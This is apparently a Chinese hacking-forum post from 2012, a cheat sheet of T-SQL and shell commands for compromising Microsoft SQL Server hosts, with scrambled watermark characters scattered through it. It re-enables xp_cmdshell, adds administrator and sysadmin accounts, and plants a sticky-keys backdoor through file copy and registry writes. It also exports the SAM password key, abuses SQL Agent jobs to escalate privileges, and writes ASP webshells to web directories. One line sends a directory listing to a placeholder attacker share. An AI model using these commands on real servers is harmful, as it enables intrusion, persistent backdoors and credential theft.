1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
6 s- a @ L: n/ Q3 l恢复方法:查询分离器连接后,' P/ Q2 G" S" D- Q* P( U# i0 u
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int ( Q5 h l* G5 w1 S% t, @
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
8 g, D0 b( Q9 u T" i然后按F5键命令执行完毕) |8 _; D- P- Z4 e6 Z% S
' @, _- t3 v) U" W" n1 ^2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。) V6 T# {8 q2 G8 [; e
恢复方法:查询分离器连接后,4 m& Y, }8 z% z8 H% |4 L
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"7 Q3 m1 E) x& c
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'$ B" P1 ]2 T& f' y5 L$ p8 Z
然后按F5键命令执行完毕
2 F+ \, H. v5 G. ~, ^+ k
" o- k; n! k8 m; E8 B. S1 f }3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
% e; X# L& _$ i6 J恢复方法:查询分离器连接后," j: a4 w6 z5 b, c* T- i' G. x
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
6 h# D8 W* T+ D2 h9 \6 b- b第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 9 b) b' S9 V# M/ F! m
然后按F5键命令执行完毕
8 x. x, g& g% _& {* F& i* e
y; P% W% k W- y7 a4 终极方法.
9 b7 s6 C, n5 S4 Y! Y如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:. o" [1 d+ K% v
查询分离器连接后,7 a# Y! k; I5 F, g# \
2000servser系统:; p$ _' H* j6 I4 }; T' O$ c1 i
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
}4 B! H, v0 n& ^9 h, j7 F- F" t. ]- B0 X5 V2 l% P
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'. ?! K6 r0 J1 U: w$ _
9 x9 W# O5 v6 e1 E+ o. e- q" Mxp或2003server系统: c' M0 t0 j. ~6 [ _
; j! ~+ F- _) G* f& T! l
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'1 J$ G6 s. Z* @4 m. b5 J: t
4 n _% L, B/ a9 K' V$ Fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
% S2 i0 a3 `: G( K) N9 i1 s" @$ g! l; G& Z! o! b) \, G% j
" g) m# ?: h6 A. P( B: g
五个SHIFT
9 R) W) V: E# ^ U; Wdeclare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
% q% F* B0 _; G X0 I- I* E+ x
) Y. r0 P' [* o& s' Pdeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 6 p7 H5 Q7 E6 Q' R! S4 u
" |4 }& l' w3 b- `
xp_cmdshell执行命令另一种方法: B0 U8 H q/ o9 U
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' % m; G& C/ r- v% q# T$ Y
" [5 x0 c Y: ^, L* h ~1 E# p判断存储扩展是否存在
0 O9 r9 v) [. nSelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'3 w, y- J8 D; K# F
返回结果为1就OK: r( H$ e0 [: a" s
6 u) a* @) |! ?' _. g1 q
" ^+ h. l( X* J4 L& p. ~上传xplog70.dll恢复xp_cmdshell语句:' e: v1 \, h( p" u ?
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'" L9 s+ I! W2 l2 C& h0 A* o0 Q
) f& {( M5 Q% C b: N! X
否则上传xplog7.0.dll, Q+ V2 z" q# O" t; ^ H. ]& R
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'& V0 ?- I7 `0 S, e& T8 k
3 ]7 ~- C5 z$ |: ?* x$ f. \( \
L( I1 E/ t* L6 t" `% L7 Z
% i' J* f I6 X W* H首先开启沙盘模式:! [& v% [2 d, Z3 p0 T. u K
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
. R9 h6 d( O& a
8 |8 S# i8 \$ w6 u! V然后利用jet.oledb执行系统命令
/ W/ ^! _7 @; o6 ^$ B ^select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
& k7 j. v! N. {返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了( r& v* y' y; F% j3 d
7 z* N& N; }+ {6 m( G% M3 g5 s
* y1 [3 v. `' g) R
- [' g& |: z( k* w& n恢复过程sp_addextendedproc 如下: $ ~ S" P$ h. V* H5 X2 R, [
create procedure sp_addextendedproc --- 1996/08/30 20:13
) |6 J, B" j, ^@functname nvarchar(517),/* (owner.)name of function to call */
: J2 }; @9 t: Q4 V! H8 [' W' y$ r@dllname varchar(255)/* name of DLL containing function */ / s# x+ p7 a6 I7 P0 Y3 e
as 2 `: u4 v, `6 f+ q3 T" h5 Q: ?2 Y2 F
set implicit_transactions off
6 a$ l5 o' {( @if @@trancount > 0 " B! v; d0 }6 Y y0 T/ d+ [
begin
9 u- T( f* U& Praiserror(15002,-1,-1,'sp_addextendedproc') - G5 \$ l0 L, X' x+ L, c
return (1) : G; L7 e0 `. e3 T7 G
end + d$ j: r* J o7 L9 _
dbcc addextendedproc( @functname, @dllname)
) y& A! S7 l1 |8 @return (0) -- sp_addextendedproc 1 W2 M* i: ?( I2 ]# X* p) W2 P) A
GO
; m+ `' X& H( R# M N ]+ T% D$ h
; \& |0 i" o# o$ u1 [% b' d) y0 ]# d Q) Y9 T" t( X9 Z
# l0 |- T) Q: y% K/ J0 q# {$ [
导出管理员密码文件% h) A" W0 l9 C$ z
sa默认可以读sam键.应该。7 m3 Z4 f2 I5 k o( M% m5 i3 P- @( B
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
( D. T5 A6 m# l5 Bnet user administrator test
) B' a: W, p2 v( ]( L! ?) ~用administrator登陆.8 T/ d* A2 G# ?% p; E
用完机器后
) s5 L9 Q: W+ v8 Sreg import c:\test.reg
. K1 R$ f% o% _根本不用克隆.
2 k6 q9 d8 ^* i" T- l% [! A/ t找到对应的sid. $ b( S4 S3 Q1 |6 B/ \/ w
$ U |$ t+ _3 K" `/ U! s2 O& r: A! N% ]* a; O5 M6 J0 W. Y8 w, v
$ ?- w9 ]6 x3 ]* x恢复所有存储过程, B) k1 G2 p1 S" k' F; t5 V6 W9 o
use master " z' s. r& T* {8 _- {) v* {# R& q
exec sp_addextendedproc xp_enumgroups,'xplog70.dll' " } C+ J8 V# e9 l+ i
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' B9 K& l5 Y# M6 L) e2 K
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' , z, m& }2 ^9 F8 {8 {+ D
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
8 Z( D" }( X6 q) K! h/ Oexec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
3 n- p6 ] U. S, M5 Q$ ] Dexec sp_addextendedproc sp_OACreate,'odsole70.dll' 0 c8 [/ P6 [; [4 u, W" J
exec sp_addextendedproc sp_OADestroy,'odsole70.dll' 1 A( a+ |, Z/ k
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
( L9 I' Z/ s2 \5 J5 ^6 Z# j' n6 r4 A. aexec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
8 e& o! `) f# C: d% ~) ?& H. ?exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
G& r) ]% R% |; \exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
2 p) [7 B& \- x4 {+ J/ gexec sp_addextendedproc sp_OAStop,'odsole70.dll'
2 |) O- p4 ^: W* Aexec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' 8 t9 j- j" `& [6 F# g* x6 K2 s
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' 2 ? ^. A( ]% t2 a: _1 ]0 s& O9 B/ {6 i
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
& G( m t; \$ u* T* K; B2 @exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
; b0 P, H9 a0 F$ kexec sp_addextendedproc xp_regread,'xpstar.dll'
' r7 e8 Z, s" ?* _% f' M) hexec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' ) J+ T9 x4 l" r4 w4 @0 R# J$ V& D
exec sp_addextendedproc xp_regwrite,'xpstar.dll' : W: e; ?1 h) t3 ]" K
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'# F% c, k, ^% L8 x
4 n! O' d4 k+ b. _1 ]5 z! X$ g# G1 b5 f9 k* z
建立读文件的存储过程
1 y* w' p1 z* x& ?) I* F9 v3 P# XCreate proc sp_readTextFile @filename sysname% N& c& M* i9 w! M" p3 }- c
as& M2 j/ M' ] o( p; T) j
# H" y: v; w) X9 b: Q
begin
7 k; n2 ?, T( d3 d) Q& o2 } set nocount on
4 U, z6 [' a3 m8 l+ O$ Q Create table #tempfile (line varchar(8000))
- N, m7 `' O, h: f- h1 P- r exec ('bulk insert #tempfile from "' + @filename + '"'): H: M( `4 }6 D; a9 N
select * from #tempfile
% L* s( H5 |. E F/ Z4 T drop table #tempfile
/ ` j, \, g9 I4 t, a# [End7 S9 h; L* m% ~% v
E8 Y/ D' F6 n. s1 g$ Rexec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件% E, d# d) s2 s6 ], j/ o
查看登录用户
2 j. }" w* B- |/ r! N o: N* f! ]/ aSelect * from sysxlogins
- ^* q2 H6 J+ C5 A: `) r$ P3 c& B, V+ @
把文件内容读取到表中3 m) R# _0 `3 G+ U( Q! T7 Y- V/ _
BULK INSERT tmp from "c:\test.txt"
( V0 N; {2 M" U6 ~$ ~& f- L& IdElete from 表名 清理表里的内容/ X5 _' W' h/ |# ^9 Q6 j6 R
create table b_test(fn nvarchar(4000));建一个表,字段为fn5 I v2 x6 X) A% W
$ h4 \# B1 V) ?; W9 U3 T1 _4 |, I5 d$ _7 L, y8 h
加sa用户9 n8 g3 f! ~/ w
exec master.dbo.sp_addlogin user,pass;
2 X8 @3 B& s$ Kexec master.dbo.sp_addsrvrolemember user,sysadmin$ O. F! S& z C9 u7 z
# O3 [5 x X- P- t8 m0 j
7 c. z' \2 l! v! V2 ]! q+ a1 {# V+ j1 q7 J7 t
读文件代码# m: j8 Z: i# [: n' f
declare @o int, @f int, @t int, @ret int/ W$ A0 i) e0 }3 m
declare @line varchar(8000)
+ V" K1 B [# v4 }- a1 g8 a% @exec sp_oacreate 'scripting.filesystemobject', @o out$ `% z* w% ]* a5 }: Y9 |
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
* b1 U% u8 N3 Hexec @ret = sp_oamethod @f, 'readline', @line out
! I3 b8 U) W. l% M9 Wwhile( @ret = 0 )- F) }; F( @1 b# `2 [2 r" _% n
begin
# v7 u) `& \3 S. K; g7 q8 Lprint @line
4 u! d7 |. O! S0 F; Z4 Eexec @ret = sp_oamethod @f, 'readline', @line out x; m. i% B, `* T4 S- g) `
end
# c: D' c2 }+ l) v' p. F
9 R* n, p3 D. v/ b5 J
3 |1 L J! r& [ r写文件代码:
) b: ~& M6 @; i7 W+ I" A5 L: |declare @o int, @f int, @t int, @ret int
9 k: O4 ~7 i( ]* A5 E' uexec sp_oacreate 'scripting.filesystemobject', @o out
+ O6 r9 W3 s* C) t+ i" |, Bexec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
7 B6 a# t1 I% ?0 R: ^exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》+ k! l/ o! V2 L3 k) J9 q! `
7 f5 _7 W6 Z3 J: x5 L+ I- N
* R7 C' z; S9 n' [% A添加lake2 shell% ^+ r1 x: c, C
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
8 u! s0 p5 ?1 ]4 ]5 U/ hsp_dropextendedproc xp_lake2
T& K- p& w D" f: M7 @EXEC xp_lake2 'net user'. G' ?) `' k! Z
0 T* J. D& W: r4 z. U6 {
: u# J4 a" _4 t8 Y
得到硬盘文件信息
( [, C7 m" O c$ l/ G4 j t--参数说明:目录名,目录深度,是否显示文件
+ O, F1 P3 f3 q0 p% vexecute master..xp_dirtree 'c:'
0 o% d% p0 X3 }$ ]5 H% Q* Nexecute master..xp_dirtree 'c:',1
( X9 V& r, R( ?/ b0 lexecute master..xp_dirtree 'c:',1,1 ! r) W% y+ v- V
/ p# v9 R' {7 D* Y
' r# O! Y1 x+ M7 a0 ~% a读serv-u配置信息
: u, @9 X6 l, A& m) W1 `3 Gexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'7 k- ^5 k9 |; l1 w# T
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'5 N: J3 W) Q" g
! b, _* `8 q8 Q$ \' [; d" k# v通过xp_regwrite写SHIFT后门7 v- j3 b4 h8 l$ W. G" b
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--7 s. s7 J* ]/ ^# k0 e+ a$ E
' @/ h$ b+ u, b0 f3 D
8 [1 T6 `9 C/ n. t! d4 z
5 T$ D( Q) U( P. |1 c找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
+ p: a3 i4 k' i$ U# lexec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
& G* S3 H) M3 I* r& Z( v0 W) k. Q, J6 V! H9 y
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'; D1 R( T( _# p% A1 k3 {% l9 T
5 n5 j% _/ C7 \+ [- M
, I0 w2 r( e0 ~% g
: a) v: `$ S6 v& z$ e1 k+ jsql server 2005下开启xp_cmdshell的办法
# n: D$ g! Y/ j0 z# |0 e2 w/ i" j) X+ s# E) S
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
1 H& J9 A% h; k4 |+ G: G" g! M6 X! V' V6 U+ A
SQL2005开启'OPENROWSET'支持的方法:! q8 z' y2 h0 |6 g
- g" e- r! j$ \9 w, j! ]# aexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
# j: u) I+ e% ^) V$ }8 R K7 r+ q" H! n* p. q* _$ m- q }; q
SQL2005开启'sp_oacreate'支持的方法:
6 M: E5 r; q k! o$ Z) A4 n& C# `9 @! h! \( L% y
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
' o- U* @) \! { L# @" ]8 z- N! w9 [
/ w6 O! s' K5 N3 m0 b5 l' V w- S0 g+ r: R7 Y
& n7 r7 i6 O4 F' a' K% ]1 I7 D3 Z
H" _2 a" Y. s; h) z5 i
4 ?, E) N2 |, V/ R s: l; |& {3 i. G
6 R8 k6 `5 x# [! z: y' z' ~: i
# q' Q% ~, Q5 d0 Z% \7 h; p- K3 M! [! s% k$ d7 Y
# I3 X- N! x' ~9 f$ a" D% Z. n& y- D7 \1 b; Y
. f$ J2 d6 |- e, e F! h! b
( J& e2 ^' l1 n( f+ _+ I
3 S4 ^9 R* ~; ~3 O5 s' O5 O/ S
8 w+ E- I) V. l- C9 c; ]% b8 ~. v9 t& Q' S2 [' S
1 i& ^4 i D! H5 g! O2 l/ W6 ^9 X) W
0 v' d, ?. T$ t
0 S2 I+ V4 V5 z* f8 M1 t6 W5 c
* Q/ b/ M! T( S6 ^* k" ~* \7 Y7 D) q9 ?6 `! _
' ^- v* i2 h! y' |. F$ z2 D5 K1 l2 N
以下方面不知道能不能成功暂且留下研究哈:
- [/ b$ k3 g& |: F5 n4)
/ L P. x# A V. x& m2 wuse msdb; --这儿不要是master哟
4 |4 l, \; e+ S! Cexec sp_add_job @job_name= czy82 ;
w5 R! L4 j7 ]3 D1 Texec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
! M7 K0 c7 R! m+ @" H! T# z* j9 C' uexec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;# r+ d- ]$ N4 Z" j
exec sp_start_job @job_name= czy82 ;
. [0 g t, ?7 U3 w$ X
/ _/ n: Y5 ~( ^) {7 L' G' P+ O利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
# D# K+ J' H' r+ D8 _$ d" L执行tsql语句了.
: D5 y# b) u& R1 S5 I j; X3 Z对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
9 v& k2 n/ s! a! x" H! |第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
8 K7 M: `! n* h/ R7 dnet start SQLSERVERAGENT5 M$ F+ S; b& K" b, K, K& A' g+ e
9 e Q4 U, H4 U: q8 c, j
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的+ M; X) [. R) J E; l7 M
USE msdb
V+ Y( k0 x& ~* O4 j: L- ?. HEXEC sp_add_job @job_name = GetSystemOnSQL ,+ s- M8 {" f9 U
@enabled = 1,
* F( M* L# e: B@description = This will give a low privileged user access to* D/ k+ I4 s* O( l+ ?
xp_cmdshell ,$ d! V& f- _- J# {" E" d: B& J
@delete_level = 1
0 i! w6 G# t( _EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
& l$ r q: Y) }4 L@step_name = Exec my sql ,7 m1 t# v1 m8 G/ U+ u: v
@subsystem = TSQL ,
, o6 O. y- U* \4 G4 P; u9 {' B* B@command = exec master..xp_execresultset N select exec) Z( S: `+ W& P1 i1 e9 D: m3 x
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
5 l/ `9 [( ]1 D2 EEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
3 E: I) X+ T8 c# |@server_name = 你的SQL的服务器名
4 A9 x% ^; |9 ?$ L4 X; b _EXEC sp_start_job @job_name = GetSystemOnSQL 6 Z- c: V! A% L5 {5 n% z
1 V$ o. Y& @! {4 p$ `+ V. y
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以9 ]" a2 l2 L5 N* g! t2 y
才让我们可以以public执行xp_cmdshell6 I# G8 p) \6 K ^
9 E& M! u8 G, { I6 {4 l0 c
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)! N% |7 P6 q2 Z& d% }# J
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968. L! j+ H% I) d
' o8 v+ g2 z7 k! T# k1 ^USE msdb1 i! X+ K% d# O. B" p) E& d( k! E6 ]
EXEC sp_add_job @job_name = ArbitraryFilecreate ,
% b2 t% T9 [# n" [% \/ u@enabled = 1,3 n4 M" G0 { ]+ F- `
@description = This will create a file called c:\sqlafc123.txt ,
; J$ G1 s9 x" j7 Z' h% j1 q@delete_level = 1
! R1 l8 ]' R5 C5 l3 m: l: QEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,3 @ f4 ]# z' |4 Q9 `
@step_name = SQLAFC ,9 ^; { Z4 x% k; h$ G. W+ c: k2 @
@subsystem = TSQL ,
G6 t4 c" G6 b* s@command = select hello, this file was created by the SQL Agent. ,
3 x% M1 Z+ G U, k@output_file_name = c:\sqlafc123.txt 2 q& f M. S$ O- G
EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,* m/ J) L: f, ~, Z+ Q2 v- k
@server_name = SERVER_NAME
. ` N/ y( d* V7 w; fEXEC sp_start_job @job_name = ArbitraryFilecreate
3 Q9 K0 B0 k& n1 I$ W' l) X* K# W. K N: J$ G7 a
如果subsystem选的是:tsql,在生成的文件的头部有如下内容
) J- f: {4 R5 l/ d/ f3 e, k2 J6 d9 f/ A1 {; s
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
& _% {" T0 ?) c1 ~3 F# J, A$ K----------------------------------------------/ s0 D" p* h/ x7 s
hello, this file was created by the SQL Agent.
! Q" s# H8 R j7 N( j
0 K+ P7 ^: v5 u- m' L(1 ?????)) M6 f+ ~7 D6 K' y6 k) @
) Y0 v* ^1 h( w3 H6 ?. R9 c" F所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员/ m2 \, S. k F2 N8 v
命令的vbs文件到启动目录!
; `& x1 r$ t) n* d2 W6 Q6 M, A# E7 M" l
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)7 {; e6 p# T+ W6 I% l& w' u6 p
关于sp_MScopyscriptfile 看下面的例子
% F6 i" d- }/ r- }7 w& n) J0 Zdeclare @command varchar(100) 8 E/ g k( p' E! ]
declare @scripfile varchar(200) ( b/ M- u% L! e. |
set concat_null_yields_null off
" T& W2 g5 { O# g7 T' Wselect @command= dir c:\ > "\\attackerip\share\dir.txt" * R& X1 x" U! p2 N' v0 t: x
select @scripfile= c:\autoexec.bat > nul" | @command | rd " . J: C' j" E: B# P3 j! t: ?2 o
exec sp_MScopyscriptfile @scripfile , 2 V- [1 X5 U" p- }7 V& s. V
! n N5 f2 s- Z* ^) @. _! X1 D8 D# F
这两个东东都还在测试试哟: _, k, ^% L7 a
让MSSQL的public用户得到一个本机的web shell
5 g* `! b3 k$ K7 a: _! F
. l4 H$ D* ]% Z* I9 _: Fsp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
0 n% u4 x) ^- h. b- V7 l3 V5 k: ^& S--@query= select <img src=vbscript:msgbox(now())>
& W2 A8 H& @) ^3 h" @- u--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> : d. ^" ^' ], Z1 z+ I
@query= select & m6 O$ h2 _. I) ^8 p" a b2 O( [
<%On Error Resume Next
8 q) K. M& I3 P! O& t1 MSet oscript = Server.createObject("wscript.SHELL")
" C) i3 a# \) G( hSet oscriptNet = Server.createObject("wscript.NETWORK") # x) z7 F7 [8 L1 c; n' U" O
Set oFileSys = Server.createObject("scripting.FileSystemObject") 7 L7 l3 P4 t7 K8 }7 Z: n0 {
szCMD = Request.Form(".CMD") 3 Y' {: S. f t9 C/ P
If (szCMD <>"")Then 1 G4 A! p: W8 F, \! y
szTempFile = "C:\" & oFileSys.GetTempName() % Q. r5 m# W" S
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) ! t! j$ N/ Z2 M& h$ a0 q
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) : x/ o$ L- N6 y( G/ b* i; o- Y
End If %>
$ p! G& h& e1 Z7 I$ O ^9 m<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
4 I1 O9 ?. t1 P: O7 W% _<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"> % T; h! v1 p$ {" P; W6 f U
</FORM><RE>
. L3 U0 t3 ]9 J8 t. [. }<% If (IsObject(oFile))Then 2 ^5 J, J, p% {
On Error Resume Next
$ Y3 H/ m" D. L& c OResponse.Write Server.HTMLEncode(oFile.ReadAll)
3 V/ J5 k% q! N- e W. P( v1 noFile.Close ' `% g3 b- _4 p: i
Call oFileSys.deleteFile(szTempFile, True) 9 _; K! _. E8 i! f& h7 \4 B0 h
End If%> 3 P+ v% J S7 A- [6 I9 U( C* l/ B
</BODY></HTML> 8 m) v; S5 t6 o
|
发表于 2012-9-15 14:37:30
收藏
支持
反对